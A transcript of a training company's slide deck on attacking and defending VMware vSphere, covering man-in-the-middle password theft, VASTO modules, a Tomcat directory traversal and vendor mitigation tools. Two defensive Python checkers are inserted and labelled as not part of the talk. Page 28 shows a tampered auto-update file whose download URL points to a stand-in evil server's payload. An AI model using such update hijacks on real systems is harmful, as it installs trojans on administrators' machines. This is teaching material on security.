WELCOME! Presented by Duane Anderson of VMTraining – CPTS, CEH, CPTE, CDFE, CWSE, CISSO, CVE, CVSE and Security+ Hacking Uncovered: VMware® Advanced VMware® Security The Latest Threats and Tools

Upload: kenna

Post on 24-Feb-2016

TRANSCRIPT

Page 1: WELCOME!

WELCOME!

Presented by Duane Anderson of VMTraining – CPTS, CEH, CPTE, CDFE, CWSE, CISSO, CVE, CVSE and Security+

Hacking Uncovered: VMware® Advanced VMware® Security
The Latest Threats and Tools

Page 2: WELCOME!

Free Drawing for 1 seat in the VMware Advanced Security Class with Firebrand.

Cool Offer!

Page 3: WELCOME!

vSphere – Just Another Layer to Attack?
Recent Cases involving VMware

What are you in for? Hold On!

Pen Testing Methodology
Gueststealer
TomCat Zero Day Directory Traversal
VASTO
Mitigation Techniques
3rd Party Mitigation Tools

Page 4: WELCOME!

VMware – 80% of the Market Share

Do the Tools used in Pen Testing work with virtualization?

Are there hacks being designed just for VMware?

What is this costing us?

What is Happening today?

Page 5: WELCOME!

The Need is Here!

• CyberCrime and CyberWar Predictions for 2011

• #2 – Cloud Computing and Virtual Machines (VM) will be specifically targeted by cybercriminals and cyber terrorists resulting in VM malware and Cloud downtime and Cloud data theft.

Hakin9 – Issue 01/2011(37)

Page 6: WELCOME!

What are the main security concerns associated with virtualization in general?

• Segregation of Duties
• Accounting/Logging
• New APIs: VMsafe, vStorage, vNetwork
• VMsafe Virtual Appliances
• Plug-Ins
• Shared Resources – can they be attacked? Memory, CPU, Datastore

Time to Discuss

Page 7: WELCOME!

Virtualization – Just Another Layer to Attack

Management Interfaces
• vSphere Client
• APIs
• Plugins – VMware: Update Manager, Guided Consolidation, VMware Converter, Storage vMotion
• Plugins – 3rd Party: Back Up Solutions (3rd Party – Veeam), RDP (3rd Party – The RDP plug-in, by Juxtaposition), Invoke Plugin

Page 8: WELCOME!

Web Service

ESX and vCenter both use a Web Service
• vCenter on by default – Why?
• ESX disabled – Thank God

Tomcat Web Service
• How many holes have we found here? WOW

Utilizes a Proxy
• This is the same proxy used by hostd.

Page 9: WELCOME!

VMware is using an old version of TomCat that leaves the username and password in a world readable file!

Fixed by a recent update for vCenter 4.1

TomCat

Page 10: WELCOME!

VMCI

• It provides communication between VMs and trusted endpoints on the host, and from VM to VM. The vmkernel is considered a trusted end-point.

• This interface is implemented as a virtual PCI device, present by default in all VMs created with virtual hardware version 7.

VMCI, or Virtual Machine Communication Interface, is an interface built into the virtual hardware of a VM.

http://pubs.vmware.com/vmci-sdk/VMCI_intro.html

Page 11: WELCOME!

Threats: Perceived, Known

Risks: Probability, Potential Impact

Time to Discuss

Page 12: WELCOME!

Secunia Historic Advisories: ESX 4.x, ESXi 4.x, vCenter Server 4.x

nvd.nist.gov: Over 40 Vulnerabilities for VMware Products

McAfee Threats – VMware: ESX Server Heap Buffer Overflow, vCenter Update Manager CSS, vCenter Update Manager Directory Traversal

Some Vulnerabilities

Page 13: WELCOME!

Chained Exploit Example

130 Million Credit Cards Stolen – Gonzalez Indictment
• SQL Injection Attacks
• SQL Injection Strings
• Malware
• Root kits
• Visiting the stores
• Disabling the logs
• Using Proxies

Little Known Fact: Occurred on VMware!!!!

Page 14: WELCOME!

This does not change, regardless of the environment being tested.

Information Gathering
Scanning
Enumeration
Penetration

Fail: Start Over or tell them great job

Succeed: Escalate Privileges, Steal Data or Leave proof of hack, Cover Tracks, Leave Backdoors

Methodology

Page 15: WELCOME!

Google
NMAP – Since v4.8
Ettercap
Cain and Abel
Metasploit

Claudio Criscione – VASTO – Virtualization ASsessment TOolkit

Tools….

Page 16: WELCOME!

Shodan – You have to be kidding me!

Page 17: WELCOME!

Shodan – You have to be kidding me!

Page 18: WELCOME!

We have to find the systems first. Just like any other service, ESX has its own tells. NMAP will give you what you need. Let's see this in action!

Scanning for ESX

Page 19: WELCOME!

Auxiliary Modules
• Yes, you can create your own modules.
• We will take a look at VASTO – Virtualization ASsessment Toolkit by Claudio Criscione

Meterpreter
• The purpose of meterpreter scripts is to give end-users an easy interface to write quick scripts that can be run against remote targets after successful exploitation. (Metasploit)
• Meterpreter is an effective tool for creating backdoors.

Page 20: WELCOME!

How we understand Fake Certificate Injection to work.

ARP Cache Poisoning will allow us to perform a successful SSL crack!

The hacking tools will create fake certificates. Two simultaneous SSL connections are established: one between the victim and the hacker, the other between the hacker and the real server.

The communication process starts on port 443, and once the SSL authentication has been established VMware moves the communication to port 902.

[Diagram: the victim sends an SSL request and receives an SSL reply carrying a fake certificate from the hacker; the hacker sends its own SSL request to the ESX Server and receives the real self-signed certificate in reply. What is ciphertext on the wire is cleartext at the hacker, who can Copy & Alter it or Stop it.]

Page 21: WELCOME!

VIC Client Login

Stealing the Password

Page 22: WELCOME!

DECISION TIME!

Page 23: WELCOME!

Password Revealed…

Page 24: WELCOME!

You are still vulnerable even if you use vCenter.

I can offer this:

Once the above password is stolen, you can log in to the host as vpxuser with that password.

Screenshots

Page 25: WELCOME!

Presented at ShmooCon 2010

VULNERABLE VERSIONS

• Server
  • VMware Server 2.x < 2.0.2 build 203138 (Linux)
  • VMware Server 1.x < 1.0.10 build 203137 (Linux)
• ESX/ESXi
  • ESX 3.5 w/o ESX350-200901401-SG
  • ESX 3.0.3 w/o ESX303-200812406-BG
  • ESXi 3.5 w/o ESXe350-200901401-I-SG

Page 26: WELCOME!

GuestStealer
• Thanks for the Virtual Machines!

Dictionary Attack
• How Large is your dictionary file?

Fingerprinting Tool
• Need to know exactly what is running?

VASTO – Auxiliary Modules

Page 27: WELCOME!

vSphere Client Communication

Auto Update Process
• <patchVersion>3.0.0</patchVersion>
• <apiVersion>3.1.0</apiVersion>
• <downloadUrl>https://*/client/VMware-viclient.exe</downloadUrl>

[Client/Server sequence diagram, steps 1–4]
GET /client/clients.xml (AutoUpdate URL)
RetrieveServiceInstance / ServiceInstance
RetrieveServiceStatus / Status
Login

Page 28: WELCOME!

The Auto Update Process
• <patchVersion>3.0.0</patchVersion>
• <apiVersion>3.1.0</apiVersion>
• <downloadUrl>https://*/client/VMware-viclient.exe</downloadUrl>

The Evil Guy
• <patchVersion>10.0.0</patchVersion>
• <apiVersion>3.1.0</apiVersion>
• <downloadUrl>https://evilserver.com/evilpaypoad.exe</downloadUrl>

VASTO VILurker

Page 29: WELCOME!

Change the clients.xml filename

The package will run under the user's privilege!
• Administrator Anyone?

Provide your nasty trojan package.
• Could be combined with other attacks.

Create a fake web interface so you look legit!

This can be done as MiTM or Rogue Server

You will trigger a "certificate error"

VASTO VILurker
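Defender-side example, added here and not part of the presentation or of VASTO: a sanity check over the three clients.xml fields the slides show, flagging the VILurker-style swap (a jump to patchVersion 10.0.0 and a downloadUrl pointing at a host other than the server that served the file). Both XML samples, the wrapper elements, the host names and the "newest published version" value are assumptions for the example.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed samples. Only the three elements shown on the slides are
# meaningful; the <ConfigRoot>/<clientConnection> wrapper is assumed.
BENIGN_XML = """<ConfigRoot>
  <clientConnection id="0000">
    <patchVersion>3.0.0</patchVersion>
    <apiVersion>3.1.0</apiVersion>
    <downloadUrl>https://*/client/VMware-viclient.exe</downloadUrl>
  </clientConnection>
</ConfigRoot>"""

# The "Evil Guy" variant from the slides, with a constructed host name.
TAMPERED_XML = """<ConfigRoot>
  <clientConnection id="0000">
    <patchVersion>10.0.0</patchVersion>
    <apiVersion>3.1.0</apiVersion>
    <downloadUrl>https://evilserver.example/evilpayload.exe</downloadUrl>
  </clientConnection>
</ConfigRoot>"""

def parse_version(text):
    """'3.0.0' -> (3, 0, 0); a malformed string raises ValueError."""
    return tuple(int(part) for part in text.strip().split("."))

def check_clients_xml(xml_text, served_by_host, newest_known_patch="3.0.0"):
    """Return a list of findings; an empty list means the document looks sane.

    served_by_host is the vCenter/ESX host the client actually fetched
    clients.xml from; the '*' wildcard on the slides stands for that host.
    newest_known_patch is the highest client version the administrator has
    actually published (assumed value, taken from the slide).
    """
    findings = []
    for conn in ET.fromstring(xml_text).iter("clientConnection"):
        patch = conn.findtext("patchVersion", "")
        url = conn.findtext("downloadUrl", "")
        try:
            if parse_version(patch) > parse_version(newest_known_patch):
                findings.append(f"patchVersion {patch} is newer than any published client")
        except ValueError:
            findings.append(f"unparseable patchVersion {patch!r}")
        parts = urlparse(url)
        if parts.scheme != "https":
            findings.append(f"downloadUrl is not https: {url}")
        if parts.hostname not in ("*", served_by_host):
            findings.append(f"downloadUrl host {parts.hostname!r} differs from the server that served clients.xml")
        if not parts.path.endswith("/client/VMware-viclient.exe"):
            findings.append(f"unexpected installer path {parts.path!r}")
    return findings
```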

Page 30: WELCOME!

VASTO Autopwn

Autopwn – How easy can it get?

Uses a flaw in the Tomcat Web Server

Transfers the Latest Session File from vCenter using a Directory Traversal Attack.

Admin rights without knowing a username or password!
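Detection-side example, added here and not part of the presentation or of VASTO: a scan over Tomcat-style access-log lines for the encoded `..` segments that a directory traversal request, like the one Autopwn relies on, leaves behind. The log lines, addresses and paths are constructed for the example, and it handles single and double percent-encoding.

```python
import re
from urllib.parse import unquote

# Constructed Tomcat-style access-log lines (common log format). Addresses,
# paths and timestamps are made up; the traversal lines only show the pattern.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Feb/2016:10:01:02 +0000] "GET /client/clients.xml HTTP/1.1" 200 412
10.0.0.9 - - [24/Feb/2016:10:01:09 +0000] "GET /ui/css/main.css HTTP/1.1" 200 1830
10.0.0.7 - - [24/Feb/2016:10:02:30 +0000] "GET /ui/files/..%2F..%2Fsome-file.bin HTTP/1.1" 200 9911
10.0.0.7 - - [24/Feb/2016:10:02:31 +0000] "GET /ui/files/%252e%252e/%252e%252e/other.txt HTTP/1.1" 404 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def decode_fully(path, rounds=3):
    """Strip up to `rounds` layers of percent-encoding, so both %2e%2e and the
    double-encoded %252e%252e end up as '..'; stop once decoding is stable."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def is_traversal(path):
    """True when the decoded request path contains a '..' segment, i.e. it
    tries to climb out of the directory the handler serves from."""
    decoded = decode_fully(path.split("?", 1)[0]).replace("\\", "/")
    return ".." in decoded.split("/")

def find_traversal_requests(log_text):
    """Return (client ip, status, raw path) for every matching line. A 2xx
    status on a traversal request is the one to investigate first: the
    server answered it instead of rejecting it."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal(m["path"]):
            hits.append((m["ip"], int(m["status"]), m["path"]))
    return hits
```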

Page 31: WELCOME!

Mitigating These Vulnerabilities

• VMware: vShield Zones
• 3rd Party: Altor, Reflex, CheckPoint, Astaro Security Gateway, Tripwire, Catbird, HyTrust

Mitigation Tools – Best of the Breed

Page 32: WELCOME!
Page 33: WELCOME!
Page 34: WELCOME!

Trend Micro Deep Security

Trend Micro Deep Security provides advanced security for physical, virtual, and cloud servers and virtual desktops.

Modules
• Agentless Malware Detection for VMs
• Deep Packet Inspection
• Intrusion Detection and Prevention
• Web Application Protection
• Application Control
• Bidirectional Stateful Firewall
• Integrity Monitoring
• Log Inspection

Page 35: WELCOME!

Deep Security Architecture

Page 36: WELCOME!

In-depth Look – *Author's Picks

Catbird

Catbird TrustZones® policy-based security envelope for virtual infrastructures and the cloud. Enforces protection and measures compliance across virtual clusters and data centers.

Catbird virtual security appliance performs several functions:
• Hypervisor auditing
• Virtual network IPS
• Network segmentation and access control
• Vulnerability management
• Multi-tenant security
• Reports to management console

Page 37: WELCOME!

Catbird appliances collect data and enforce policies

Appliances report events to management console

Management console analyses events and correlates them to the compliance framework

Catbird – continuous compliance

Page 38: WELCOME!

1. Course Introduction and Methodology
2. Penetration Testing 101
3. Primer and Reaffirming our Knowledge
4. Security Architecture, vCPU, vMemory
5. Routing and the vNetwork
6. vStorage – Architecture and Security Implementations
7. Hardening the Virtual Machines
8. Hardening the Host
9. Hardening Virtual Center
10. Virtualizing your DMZ
11. 3rd Party Mitigation Tools
12. Putting it all Together

VMware Advanced Security

Page 39: WELCOME!

1. Course Intro & Methodology
2. Virtualization Overview
3. Planning & Installing ESX/ESXi 4
4. Using Tools to Administer a VMware Environment
5. Configuring Networking
6. Configuring Storage
7. vCenter Server 4 and Licensing
8. VM Creation and Configuration & Snapshots
9. Security and Permissions
10. Server and VM Monitoring
11. Advanced ESX and vCenter Management
12. Patching and Upgrading ESX/ESXi
13. Disaster Recovery and Backup

50 Hours of Training – 6.5 Classes in ONE

vSphere 4.1 Ultimate Bootcamp

Page 40: WELCOME!

Does vSphere really have some major issues?

Recent Cases involving ESX

Pen Testing Methodology

Web Related issues

VASTO

Mitigation techniques

Questions?

Review